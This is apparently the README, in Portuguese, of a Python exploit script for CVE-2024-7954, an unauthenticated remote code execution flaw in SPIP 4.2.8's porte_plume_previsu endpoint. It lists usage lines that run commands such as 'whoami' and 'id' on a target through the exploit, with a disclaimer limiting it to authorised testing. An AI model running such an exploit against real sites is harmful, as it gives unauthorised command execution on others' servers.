
Este script explora uma vulnerabilidade de Execução Remota de Código na versão 4.2.8 do SPIP por meio do endpoint porte_plume_previsu. A vulnerabilidade permite que atacantes não autenticados injetem código PHP através da renderização de pré-visualização de tags de imagem manipuladas.
ID do CVE: CVE-2024-7954
Componente: SPIP CMS (porte_plume_previsu)
Impacto: Execução Remota de Comandos Não Autenticada
Gravidade: Crítica
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd <COMMAND> [--proxy <IP:PORT>]
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "whoami" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "id" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "uname -a" --proxy "127.0.0.1:8080"


Este script de exploit é apenas para testes de segurança autorizados, pesquisa defensiva e fins educacionais.